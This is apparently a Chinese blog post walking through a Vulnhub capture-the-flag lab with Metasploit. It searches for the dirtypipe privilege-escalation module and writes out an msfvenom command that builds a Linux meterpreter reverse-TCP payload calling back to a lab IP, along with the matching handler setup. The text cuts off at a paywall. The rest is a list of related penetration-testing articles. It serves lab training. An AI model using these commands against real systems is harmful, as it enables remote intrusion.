Vulnhub matrix-breakout-2-morpheus靶场攻击实战之Metasploit渗透测试

原创 已于 2025-01-17 11:34:12 修改 · 1.2k 阅读 · 25 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试 #网络安全 #CTF

于 2025-01-17 11:32:21 首次发布

导语
  为什么要把Metasploit渗透测试单独拎出来讲呢是因为这个工具在渗透测试过程中是一个比较重要的工具,主要想利用这个机会来记录一下Metasploit工具的使用。

文章目录

Metasploit 渗透测试

  Metasploit Framework (MSF) 是一个广泛使用的渗透测试工具,能够帮助安全专业人员发现和利用系统中的漏洞。
  如果你还没有安装 Metasploit,可以通过以下方式安装:

  • Kali Linux:Kali Linux 已经预装了 Metasploit。
  • 其他 Linux 发行版:可以通过 Rapid7 的官方安装脚本进行安装。
  • Windows:可以从 Rapid7 官网下载安装包。

启动 Metasploit

  可以通过如下的命令来启动Metasploit

msfconsole

在这里插入图片描述
  启动之后,接下来我们就来搜索一下上次我们找到的那个漏洞。

search dirtypipe

在这里插入图片描述
  接下来查看一下命令选项有哪些?
在这里插入图片描述
  从结果中来看,这个命令需要用到一个SESSION,并且这个SESSION是一个必填项。
在这里插入图片描述
  接下来就需要我们用到Msfvenom工具。Msfvenom工具是msf用来生成payload的工具,使用msfvenom生成反向连接payloads,如下所示。

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.132 lport=7777 -f elf >~/test.elf
  • -p 指定payload(不确定靶机是x86/还是x64,可以生成32位payload,64位处理器兼容32位)
  • lhost kali IP
  • lport kali 端口
  • -f 指定生成文件类型
  • ~/test.elf 是在本机的路径

如何执行
  首先在启动Metasploit之后,我们需要用到exploit/multi/handler 模块,如下所示。

use exploit/multi/handler

在这里插入图片描述
  接下来就可以执行上面的命令了
在这里插入图片描述
  执行完成之后,就会在当前目录下生成一个test.elf的文件,如下所示。
在这里插入图片描述
  接下来,我们就可以将这个文件上传到靶机上。

最低0.47元/天 解锁文章
Vulnhub matrix-breakout-2-morpheus靶场攻击实战(一)
初学者
01-16 1013
跟之前一样,这个靶场是笔者新找的一个靶场,笔者也没有接触过这个靶场,所以在分享过程中可能有所疏漏,希望大家可以谅解,有问题的地方指出来大家一起进步。
【安全】VulnHub靶场 - Matrix-Breakout: 2 Morpheus
最新发布
风舞雪凌月的博客
05-08 871
你扮演的特尼狄(Trinity)试图调查尼布甲尼撒号(Nebuchadnezzar )上的一台电脑,赛费尔(Cypher )把其他人都锁在了电脑里,而这台电脑是解开谜团的关键。常规尝试一下对ssh登录进行弱口令爆破,用户名就用故事背景的Trinity、Cypher和root,找个弱口令字典,意料之中的不成功。这里暂时没有更好的攻击面了,只能选择使用更大的字典继续爆破目录,发现有两个文件。有一张图片,下载之后发现有隐藏的数据,是一个商标信息,暂时无法利用。下载发现图片隐写了一个zlib文件,这里就不会做了。
Metasploitable2靶机渗透学习
m0_65712192的博客
05-19 1万+
Metasploitable2靶机渗透学习
内网靶场 | 渗透攻击红队内网域渗透靶场-1(Metasploit)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
10-04 3269
外网和内网前面部分大致路线与上一期相同,这一次主要用的MSF进行上线、代理等操作,在域渗透部分与上一期相比使用了不同的手法:查看到SQLSERVER-2008的系统信息后去网络上搜集对应版本的提权漏洞,然后尝试提权;可以看到默认是监听本地的8080端口,支持9种类型的payload,这里使用PSH,反弹shell的payload使用windows/x64/meterpreter/reverse_tcp。尝试了多次才成功,拿到了WORK-7的SYSTEM权限,查看系统信息可以看到存在域REDTEAM。
无线网络渗透测试系列学习(二) - 在VMware中搭建Metasploit靶机的详细步骤以及端口的简单了解
曾铎的博客
03-10 3313
这篇文章主要介绍了在VMware中搭建Metasploit 2靶机的过程,和对计算机网络中端口概念的简单了解,罗列常用端口,以便后期回顾,下一篇文章将会讲述网络扫描的基础技术。
metasploitable3靶场渗透使用msf6实操(按照官方文档端口顺序(完整)
richardjung的专栏
01-22 3226
metasploitable3靶场使用msf6实操
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法),零基础入门到精通,看这篇就够了!赶紧收藏!
baimao__Ch的博客
03-08 1502
Metasploit framework,简称msf。Metasploit是一个渗透测试平台,能够查找,利用和验证漏洞。Metasploit是一个免费的、可下载的框架,通过它可以很容易的对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造一个攻击工具开发平台。
Vulnhub matrix-breakout-2-morpheus靶场攻击实战(二)
初学者
01-17 877
到这里,我们这个靶机就渗透测试成功了,当然有兴趣的读者可以研究下,其他的漏洞的利用看看能不能成功。记得给虚拟机打快照,防止搞崩虚拟机。
VulnHub-matrix-breakout-2-morpheus通关攻略
m0_66808441的博客
03-19 997
【代码】VulnHub-matrix-breakout-2-morpheus通关攻略。
metasploitable2靶场漏洞总结(部分)
leavrow的博客
08-17 3952
部分metasploitable2渗透靶场漏洞,有很多漏洞都过时了
构建Metasploitable 靶场环境
cmcaimao的博客
04-17 2309
原文地址:https://github.com/rapid7/metasploitable3 Metasploitable3 Metasploitable3是从头开始构建的VM,具有大量安全漏洞。它旨在用作测试metasploit漏洞的目标。 Metasploitable3是在BSD风格的许可证下发布的。有关更多详细信息,请参见复制。 快速开始 要使用https://app.vag...
Metasploit攻击靶机6步使用
weixin_45631123的博客
07-25 491
中得到的信息,查找可用于 Windows Server 2022 的漏洞利用模块。你会看到一系列可用的模块。选择一个适合的模块,比如使用。执行漏洞利用尝试获得目标系统的权限。提取目标的开放端口和服务信息。
metasploitable2靶场渗透
weixin_45349299的博客
02-13 644
title: metasploitable2靶场渗透 date: 2023-2-13 9 :16 :35 tags: vulhub categories: 渗透从入门到入土 author:Abyssaler
Metasplotiable靶场渗透
qq_67181251的博客
06-27 791
由于虚拟机和本主机在同一局域网下,可以使用ipconfig指令查看主机和靶场的网络地址,再使用Nmap对靶场进行扫描,进行信息收集。​​IP地址的网络地址为192.168.172/24,使用Nmap扫描查找虚拟机对应IP地址。​如图,在本局域网下共运行了一台主机和四台虚拟机,两台处于关机状态,经过分析判断可知192.168.172.135即为靶场IP。
metasploitable2靶场_超级超级详细的~
lmxstjghhh的博客
07-10 1927
Metasploitable2
内网靶场 渗透攻击红队内网域渗透靶场-1(Metasploit)零基础入门到精通,收藏这一篇就够了
程序员阿飘 的博客
12-30 1812
外网和内网前面部分大致路线与上一期相同,这一次主要用的MSF进行上线、代理等操作,在域渗透部分与上一期相比使用了不同的手法:查看到SQLSERVER-2008的系统信息后去网络上搜集对应版本的提权漏洞,然后尝试提权;可以看到默认是监听本地的8080端口,支持9种类型的payload,这里使用PSH,反弹shell的payload使用windows/x64/meterpreter/reverse_tcp。尝试了多次才成功,拿到了WORK-7的SYSTEM权限,查看系统信息可以看到存在域REDTEAM。
Metasploitable靶机渗透
qq_51926773的博客
11-01 3233
1.导入命令ifconfig得到自己的本机ip(即攻击机) 2.在kali打开nmap,输入自己的本机ip范围,得到在同一局域网的内存活的主机。 3.找到21端口,图片显示ftp。 4.接下来对靶场机器进行探测,我们使用nmap命令 nmap -sV ip/24,得到目标靶机ip 5.然后使用浏览器来浏览http服务的信息,在网址栏输入目标靶机ip 6.得到网页,网页给出信息,登录靶机的账号密码 7.然后输入telnet ip 登录靶机 8.之后再调出控制栏输入msfconsole,连接靶机.
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
【kali笔记】Metasploit Framework (MSF) 从基础到进阶使用指南,零基础入门到精通,收藏这一篇就够了
Javachichi的博客
09-27 2395
Metasploit Framework最初由HD Moore于2003年发布,并于2007年使用Ruby语言重写。MSF默认集成在Kali Linux中,同时也支持在非Kali环境下安装和使用。它提供了一套完整的渗透测试框架,包括漏洞利用模块(exploits)、攻击载荷(payloads)、辅助模块(auxiliary)、编码器(encoders)、空指令(nops)、后渗透模块(post)等多个组件。MSF的强大之处在于其可扩展性。
Matrix-Breakout-2-Morpheus靶机进行渗透测试
12-13
Matrix-Breakout-2-Morpheus靶机进行渗透测试是一项复杂且具有挑战性的任务。渗透测试的目的是通过模拟黑客的攻击手段,评估系统的安全性并发现潜在的安全漏洞。以下是进行渗透测试的一般步骤和方法: ### 1. ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

nihui123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值